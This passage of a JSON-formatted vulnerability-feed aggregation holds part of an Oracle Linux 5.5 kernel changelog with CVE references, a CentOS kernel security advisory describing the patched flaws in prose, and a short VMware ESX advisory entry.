427709]\n- [block] cfq: calc seek_mean per cfq_queue not per cfq_io_context (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq-iosched: cache prio_tree root in cfqq->p_root (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq-iosched: fix aliased req & cooperation detect (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq-iosched: default seek when not enough samples (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq-iosched: make seek_mean converge more quick (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq-iosched: add close cooperator code (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq-iosched: development update (Jeff Moyer ) [456181 448130 427709]\n- [gfs2] careful unlinking inodes (Steven Whitehouse ) [519049]\n- [scsi] arcmsr: add missing parameter (Tomas Henzl ) [521203]\n- [nfs] v4: fix setting lock on open file with no state (Jeff Layton ) [533115] {CVE-2009-3726}\n- [misc] futex priority based wakeup (Jon Thomas ) [531552]\n- [dlm] use GFP_NOFS on all lockspaces (David Teigland ) [530537]\n- [gfs2] improve statfs and quota usability (Benjamin Marzinski ) [529796]\n- [net] forcedeth: let phy power down when IF is down (Ivan Vecera ) [513692]\n- [drm] r128: check for init on all ioctls that require it (Danny Feng ) [529603] {CVE-2009-3620}\n- [scsi] htpiop: RocketRAID driver update v1.0 -> v1.6 (Rob Evers ) [519076]\n- [ipmi] add HP message handling (Tony Camuso ) [507402]\n- [mm] prevent hangs/long pauses when zone_reclaim_mode=1 (Larry Woodman ) [507360]\n- [s390] ipl: vmhalt, vmpanic, vmpoff, vmreboot dont work (Hans-Joachim Picht ) [518229]\n- [nfs] bring putpubfh handling inline with upstream (Wade Mealing ) [515405]\n[2.6.18-172.el5]\n- [fs] dio: dont zero out pages array inside struct dio (Jeff Moyer ) [488161]\n- [cifs] libfs: sb->s_maxbytes casts to a signed value (Jeff Layton ) [486092]\n- [serial] power7: support the single-port serial device (Kevin Monroe ) [525812]\n- [kABI] add pci_{enable,disable}_msi{,x} (Jon Masters ) [521081]\n- [scsi] mpt: errata 28 fix on LSI53C1030 (Tomas Henzl ) [518689]\n- [scsi] panic at .ipr_sata_reset after device reset (Kevin Monroe ) [528175]\n- [scsi] lpfc: update to 8.2.0.52 FC/FCoE (Rob Evers ) [515272]\n- [x86] add ability to access Nehalem uncore config space (John Villalovos ) [504330]\n- [net] sunrpc: remove flush_workqueue from xs_connect (Jeff Layton ) [495059]\n- [xen] ia64: command-line arg to increase the heap size (Paolo Bonzini ) [521865]\n[2.6.18-171.el5]\n- [security] require root for mmap_min_addr (Eric Paris ) [518143] {CVE-2009-2695}\n- [ata] ahci: add AMD SB900 controller device IDs (David Milburn ) [515114]\n- [net] lvs: adjust sync protocol handling for ipvsadm -2 (Neil Horman ) [524129]\n- Revert: [net] lvs: fix sync protocol handling for timeout values (Neil Horman ) [524129]\n- [net] AF_UNIX: deadlock on connecting to shutdown socket (Jiri Pirko ) [529631] {CVE-2009-3621}\n- [fs] inotify: remove debug code (Danny Feng ) [499019]\n- [fs] inotify: fix race (Danny Feng ) [499019]\n[2.6.18-170.el5]\n- [net] lvs: fix sync protocol handling for timeout values (Neil Horman ) [524129]\n- [net] igb: return PCI_ERS_RESULT_DISCONNECT on failure (Dean Nelson ) [514250]\n- [net] e100: return PCI_ERS_RESULT_DISCONNECT on failure (Dean Nelson ) [514250]\n- [nfs] knfsd: query fs for v4 getattr of FATTR4_MAXNAME (Jeff Layton ) [469689]\n- [block] blkfront: respect elevator=xyz cmd line option (Paolo Bonzini ) [498461]\n- [firewire] fw-ohci: fix IOMMU resource exhaustion (Jay Fenlason ) [513827]\n- [scsi] cciss: ignore stale commands after reboot (Tomas Henzl ) [525440]\n- [scsi] cciss: version change (Tomas Henzl ) [525440]\n- [scsi] cciss: switch to using hlist (Tomas Henzl ) [525440]\n- [x86] support always running Local APIC (John Villalovos ) [496306]\n- [x86_64] fix hugepage memory tracking (Jim Paradis ) [518671]\n- [net] bnx2: apply BROKEN_STATS workaround to 5706/5708 (Flavio Leitner ) [527748]\n- [pci] pci_dev->is_enabled must be set (Prarit Bhargava ) [527496]\n- [audit] dereferencing krule as if it were an audit_watch (Alexander Viro ) [526819]\n- [mm] fix spinlock performance issue on large systems (John Villalovos ) [526078]\n- [misc] hotplug: add CPU_DYING notifier (Eduardo Habkost ) [510814]\n- [misc] hotplug: use cpuset hotplug callback to CPU_DYING (Eduardo Habkost ) [510814]\n- [misc] define CPU_DYING and CPU_DYING_FROZEN (Eduardo Habkost ) [510814]\n- [misc] hotplug: adapt thermal throttle to CPU_DYING (Eduardo Habkost ) [510814]\n- [fs] file truncations when both suid and write perms set (Amerigo Wang ) [486975]\n- [x86] finish sysdata conversion (Danny Feng ) [519633]\n- [misc] pipe: fix fd leaks (Amerigo Wang ) [509625]\n- [x86_64] PCI space below 4GB forces mem remap above 1TB (Larry Woodman ) [523522]\n- [pci] pciehp: fix PCIe hotplug slot detection (Michal Schmidt ) [521731]\n- [net] syncookies: support for TCP options via timestamps (jolsa@redhat.com ) [509062]\n- [net] tcp: add IPv6 support to TCP SYN cookies (jolsa@redhat.com ) [509062]\n- [xen] blkfront: check for out-of-bounds array accesses (Paolo Bonzini ) [517238]\n- [xen] fix timeout with PV guest and physical CDROM (Paolo Bonzini ) [506899]\n- [net] e1000e: return PCI_ERS_RESULT_DISCONNECT on fail (Dean Nelson ) [508387]\n- [x86_64] vsmp: fix bit-wise operator and compile issue (Prarit Bhargava ) [515408]\n- [net] e100: add support for 82552 (Dean Nelson ) [475610]\n- [net] netfilter: honour source routing for LVS-NAT (Jiri Pirko ) [491010]\n- [misc] hwmon: update to latest upstream for RHEL-5.5 (Prarit Bhargava ) [467994 250561 446061]\n- [xen] panic in msi_msg_read_remap_rte with acpi=off (Miroslav Rezanina ) [525467]\n- [xen] mask out xsave for hvm guests (Andrew Jones ) [524052]\n- [xen] allow booting with broken serial hardware (Chris Lalancette ) [518338]\n- [xen] mask out more CPUID bits for PV guests (Chris Lalancette ) [502826]\n- [xen] x86: fix wrong asm (Paolo Bonzini ) [510686]\n- [xen] always inline memcmp (Paolo Bonzini) [510686]\n- [xen] i386: handle x87 opcodes in TLS segment fixup (Paolo Bonzini ) [510225]\n[2.6.18-169.el5]\n- [scsi] export symbol scsilun_to_int (Tomas Henzl ) [528153]\n- [fs] eCryptfs: prevent lower dentry from going negative (Eric Sandeen ) [527835] {CVE-2009-2908}\n- [nfs] v4: reclaimer thread stuck in an infinite loop (Sachin S. Prabhu ) [526888]\n- [scsi] scsi_dh_rdac: changes for rdac debug logging (Rob Evers ) [524335]\n- [scsi] scsi_dh_rdac: collect rdac debug info during init (Rob Evers ) [524335]\n- [scsi] scsi_dh_rdac: move init code around (Rob Evers ) [524335]\n- [scsi] scsi_dh_rdac: return correct mode select cmd info (Rob Evers ) [524335]\n- [scsi] scsi_dh_rdac: add support for Dell PV array (Rob Evers ) [524335]\n- [scsi] scsi_dh_rdac: add support for SUN devices (Rob Evers ) [524335]\n- [scsi] scsi_dh_rdac: support ST2500, ST2510 and ST2530 (Rob Evers ) [524335]\n- [s390] cio: boot through XAUTOLOG with conmode 3270 (Hans-Joachim Picht ) [508934]\n- [x86] add smp_call_function_many/single functions (Prarit Bhargava ) [526043]\n- [s390] iucv: fix output register in iucv_query_maxconn (Hans-Joachim Picht ) [524251]\n- [s390] set preferred s390 console based on conmode (Hans-Joachim Picht ) [520461]\n- [s390] dasd: add large volume support (Hans-Joachim Picht ) [511972]\n- [s390] dasd: fail requests when dev state is not ready (Hans-Joachim Picht ) [523219]\n- [s390] cio: failing set online/offline processing (Hans-Joachim Picht ) [523323]\n- [x86] oprofile: support arch perfmon (John Villalovos ) [523479]\n- [x86] oprofile: fix K8/core2 on multiple cpus (John Villalovos ) [523479]\n- [x86] oprofile: utilize perf counter reservation (John Villalovos ) [523479]\n- [gfs2] genesis stuck writing to unlinked file (Abhijith Das ) [505331]\n- [net] r8169: avoid losing MSI interrupts (Ivan Vecera ) [514589]\n- [s390] cio: set correct number of internal I/O retries (Hans-Joachim Picht ) [519814]\n- [net] e1000: return PCI_ERS_RESULT_DISCONNECT on fail (Dean Nelson ) [508389]\n- [net] ixgbe: return PCI_ERS_RESULT_DISCONNECT on fail (Dean Nelson ) [508388]\n- [crypto] s390: enable ansi_cprng config option (Jarod Wilson ) [504667]\n- [s390] dasd: dev attr to disable blocking on lost paths (Hans-Joachim Picht ) [503222]\n- [s390] qeth: handle VSwitch Port Isolation error codes (Hans-Joachim Picht ) [503232]\n- [s390] qeth: improve no_checksumming handling for layer3 (Hans-Joachim Picht ) [503238]\n- [gfs2] smbd proccess hangs with flock call (Abhijith Das ) [502531]\n- [input] psmouse: reenable mouse on shutdown (Prarit Bhargava ) [501025]\n- [xen] x86: make NMI detection work (Miroslav Rezanina ) [494120]\n[2.6.18-168.el5]\n- [gfs2] mount option: -o errors=withdraw|panic (Bob Peterson ) [518106]\n- [net] bonding: set primary param via sysfs (Jiri Pirko ) [499884]\n- [scsi] fusion: re-enable mpt_msi_enable option (Tomas Henzl ) [520820]\n- [x86] xen: add 'ida' flag (Prarit Bhargava ) [522846]\n- [net] ipt_recent: sanity check hit count (Amerigo Wang ) [523982]\n- [acpi] fix syntax in ACPI debug statement (Stefan Assmann ) [524787]\n- [s390] AF_IUCV SOCK_SEQPACKET support (Hans-Joachim Picht ) [512006]\n- [x86] fix nosmp option (Prarit Bhargava ) [509581]\n- [nfs] nfsd4: idmap upcalls should use unsigned uid/gid (Jeff Layton ) [519184]\n- [ia64] fix ppoll and pselect syscalls (Prarit Bhargava ) [520867]\n- [net] ipv4: ip_append_data handle NULL routing table (Jiri Pirko ) [520297]\n- [net] fix drop monitor to not panic on null dev (Neil Horman ) [523279]\n- [gfs2] gfs2_delete_inode failing on RO filesystem (Abhijith Das ) [501359]\n- [nfs] statfs error-handling fix (Jeff Layton ) [519112]\n- [pci] avoid disabling acpi to use non-core PCI devices (Mauro Carvalho Chehab ) [504330]\n- [nfs] fix regression in nfs_open_revalidate (Jeff Layton ) [511278]\n- [nfs] fix cache invalidation problems in nfs_readdir (Jeff Layton ) [511170]\n- [fs] sanitize invalid partition table entries (Stefan Assmann ) [481658]\n- [char] fix corrupted intel_rng kernel messages (Jerome Marchand ) [477778]\n- [net] ipv6: do not fwd pkts with the unspecified saddr (Jiri Pirko ) [517899]\n- [ata] ahci: add device ID for 82801JI sata controller (David Milburn ) [506200]\n- [misc] support Intel multi-APIC-cluster systems (Prarit Bhargava ) [507333]\n- [ext3] fix online resize bug (Josef Bacik ) [515759]\n- [xen] netback: call netdev_features_changed (Herbert Xu ) [493092]\n- [net] igbvf: recognize failure to set mac address (Stefan Assmann ) [512469]\n- [misc] documentation: fix file-nr definition in fs.txt (Danny Feng ) [497200]\n- [misc] cpufreq: dont set policy for offline cpus (Prarit Bhargava ) [511211]\n- [net] sunrpc client: IF for binding to a local address (Jeff Layton ) [500653]\n- [fs] nlm: track local address and bind to it for CBs (Jeff Layton ) [500653]\n- [net] sunrpc: set rq_daddr in svc_rqst on socket recv (Jeff Layton ) [500653]\n- [cpufreq] P-state limit: limit can never be increased (Stanislaw Gruszka ) [489566]\n- [crypto] s390: permit weak keys unless REQ_WEAK_KEY set (Jarod Wilson ) [504667]\n- [fs] procfs: fix fill all subdirs as DT_UNKNOWN (Danny Feng ) [509713]\n- [block] ll_rw_blk: more flexable read_ahead_kb store (Danny Feng ) [510257]\n- [audit] correct the record length of execve (Amerigo Wang ) [509134]\n- [net] tcp: do not use TSO/GSO when there is urgent data (Danny Feng ) [502572]\n- [net] vxge: new driver for Neterion 10Gb Ethernet (Michal Schmidt ) [453683]\n- [net] vxge: Makefile, Kconfig and config additions (Michal Schmidt ) [453683]\n- [pci] add PCI Express link status register definitions (Michal Schmidt ) [453683]\n- [net] 8139too: RTNL and flush_scheduled_work deadlock (Jiri Pirko ) [487346]\n- [x86] suspend-resume: work on large logical CPU systems (John Villalovos ) [499271]\n- [gfs2] '>>' does not update ctime,mtime on the file (Abhijith Das ) [496716]\n- [net] icmp: fix icmp_errors_use_inbound_ifaddr sysctl (Jiri Pirko ) [502822]\n- [nfs] fix stripping SUID/SGID flags when chmod/chgrp dir (Peter Staubach ) [485099]\n- [net] bonding: allow bond in mode balance-alb to work (Jiri Pirko ) [487763]\n- [x86] fix mcp55 apic routing (Neil Horman ) [473404]\n- [net] rtl8139: set mac address on running device (Jiri Pirko ) [502491]\n- [net] tun: allow group ownership of TUN/TAP devices (Jiri Pirko ) [497955]\n- [net] tcp: do not use TSO/GSO when there is urgent data (Jiri Olsa ) [497032]\n- [misc] undefined reference to __udivdi3 (Amerigo Wang ) [499063]\n[2.6.18-167.el5]\n- [scsi] st.c: memory use after free after MTSETBLK ioctl (David Jeffery ) [520192]\n- [nfs] knfsd: fix NFSv4 O_EXCL creates (Jeff Layton ) [524521] {CVE-2009-3286}\n- [net] r8169: balance pci_map/unmap pair, use hw padding (Ivan Vecera ) [515857]\n- [net] tc: fix unitialized kernel memory leak (Jiri Pirko ) [520863]\n- [misc] kthreads: kthread_create vs kthread_stop() race (Oleg Nesterov ) [440273]\n- [net] fix unbalance rtnl locking in rt_secret_reschedule (Neil Horman ) [510067]\n[2.6.18-166.el5]\n- [x86_64] kvm: bound last_kvm to prevent backwards time (Glauber Costa ) [524076]\n- [x86] kvm: fix vsyscall going backwards (Glauber Costa ) [524076]\n- [misc] fix RNG to not use first generated random block (Neil Horman ) [522860]\n- [x86] kvm: mark kvmclock_init as cpuinit (Glauber Costa ) [523450]\n- [x86_64] kvm: allow kvmclock to be overwritten (Glauber Costa ) [523447]\n- [x86] kvmclock: fix bogus wallclock value (Glauber Costa ) [519771]\n- [scsi] scsi_dh_rdace: add more sun hardware (mchristi@redhat.com ) [518496]\n- [misc] cprng: fix cont test to be fips compliant (Neil Horman ) [523259]\n- [net] bridge: fix LRO crash with tun (Andy Gospodarek ) [483646]\n- Revert: [net] atalk/irda: memory leak to user in getname (Don Zickus ) [519310] {CVE-2009-3001 CVE-2009-3002}\n- Revert: [x86_64] fix gettimeoday TSC overflow issue - 1 (Don Zickus ) [467942]\n[2.6.18-165.el5]\n- [net] sky2: revert some phy power refactoring changes (Neil Horman ) [509891]\n- [net] atalk/irda: memory leak to user in getname (Danny Feng ) [519310] {CVE-2009-3001 CVE-2009-3002}\n- [x86_64] fix gettimeoday TSC overflow issue - 1 (Prarit Bhargava ) [467942]\n- [md] prevent crash when accessing suspend_* sysfs attr (Danny Feng ) [518136] {CVE-2009-2849}\n- [nfs] nlm_lookup_host: dont return invalidated nlm_host (Sachin S. Prabhu ) [507549]\n- [net] bonding: tlb/alb: set active slave when enslaving (Jiri Pirko ) [499884]\n- [nfs] r/w I/O perf degraded by FLUSH_STABLE page flush (Peter Staubach ) [498433]\n- [SELinux] allow preemption b/w transition perm checks (Eric Paris ) [516216]\n- [scsi] scsi_transport_fc: fc_user_scan correction (David Milburn ) [515176]\n- [net] tg3: refrain from touching MPS (John Feeney ) [516123]\n- [net] qlge: fix hangs and read performance (Marcus Barrow ) [517893]\n- [scsi] qla2xxx: allow use of MSI when MSI-X disabled (Marcus Barrow ) [517922]\n- [net] mlx4_en fix for vlan traffic (Doug Ledford ) [514141]\n- [net] mlx4_en device multi-function patch (Doug Ledford ) [500346]\n- [net] mlx4_core: fails to load on large systems (Doug Ledford ) [514147]\n- [x86] disable kvmclock by default (Glauber Costa ) [476075]\n- [x86] disable kvmclock when shuting the machine down (Glauber Costa ) [476075]\n- [x86] re-register clock area in prepare_boot_cpu (Glauber Costa ) [476075]\n- [x86] kvmclock smp support (Glauber Costa ) [476075]\n- [x86] use kvm wallclock (Glauber Costa ) [476075]\n- [x86_64] kvm clocksources implementation (Glauber Costa ) [476075]\n- [x86] kvm: import kvmclock.c (Glauber Costa ) [476075]\n- [x86] kvm: import pvclock.c and headers (Glauber Costa ) [476075]\n- [x86] export additional cpu flags in /proc/cpuinfo (Prarit Bhargava ) [517928]\n- [x86] detect APIC clock calibration problems (Prarit Bhargava ) [503957]\n- [fs] cifs: new opts to disable overriding of ownership (Jeff Layton ) [515252]\n- [x86] pnpacpi: fix serial ports on IBM Point-of-Sale HW (Kevin Monroe ) [506799]", "modified": "2010-04-05T00:00:00", "published": "2010-04-05T00:00:00", "id": "ELSA-2010-0178", "href": "http://linux.oracle.com/errata/ELSA-2010-0178.html", "title": "Oracle Enterprise Linux 5.5 kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-05-29T18:34:00", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2010:0046\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* an array index error was found in the gdth driver. A local user could\nsend a specially-crafted IOCTL request that would cause a denial of service\nor, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer, possibly\nleading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to leverage a\nuse-after-free of locked, asynchronous file descriptors to cause a denial\nof service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an attacker\nwas able to cause a large enough number of collisions in the routing hash\ntable (via specially-crafted packets) for the emergency route flush to\ntrigger, a deadlock could occur. Secondly, if the kernel routing cache was\ndisabled, an uninitialized pointer would be left behind after a route\nlookup, leading to a kernel panic. (CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing, could\nuse this flaw to append data to the dumped core file. This issue only\naffects systems that have \"/proc/sys/fs/suid_dumpable\" set to 2 (the\ndefault value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\nset to 2, the core file will not be recorded if the file already exists.\nFor example, core files will not be overwritten on subsequent crashes of\nprocesses whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo files,\n\"/sys/class/scsi_host/[a qla2xxx host]/vport_create\" and \"vport_delete\".\nThese two files were world-writable by default, allowing a local user to\nchange SCSI host attributes. This flaw only affects systems using the\nqla2xxx driver and NPIV capable hardware. (CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The \"dbg_lvl\"\nand \"poll_mode_io\" files on the sysfs file system (\"/sys/\") had\nworld-writable permissions. This could allow local, unprivileged users to\nchange the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver\nused for OHCI compliant IEEE 1394 controllers. A local, unprivileged user\nwith access to /dev/fw* files could issue certain IOCTL calls, causing a\ndenial of service or privilege escalation. The FireWire modules are\nblacklisted by default, and if enabled, only root has access to the files\nnoted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS file system implementation. This could lead to a denial of service if a\nuser browsed a specially-crafted HFS file system, for example, by running\n\"ls\". (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update/\nindex.html\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016479.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016480.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\n", "modified": "2010-01-20T18:10:40", "published": "2010-01-20T18:10:39", "href": "http://lists.centos.org/pipermail/centos-announce/2010-January/016479.html", "id": "CESA-2010:0046", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "vmware": [{"lastseen": "2018-09-02T02:40:37", "bulletinFamily": "unix", "description": "a. Service Console update for COS kernel \n \nUpdated COS package \"kernel\" addresses the security issues that are fixed through versions 2.6.18-164.11.1. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228, CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues fixed in kernel 2.6.18-164.6.1 \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621, CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537, CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1 \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020, CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to the security issues fixed in kernel 2.6.18-164.11.1. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "modified": "2010-06-24T00:00:00", "published": "2010-05-27T00:00:00", "id": "VMSA-2010-0009", "href": "https://www.vmware.com/security/advisories/VMSA-2010-0009.html", "title": "ESXi utilities and ESX Service Console third party updates", "type": "vmware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
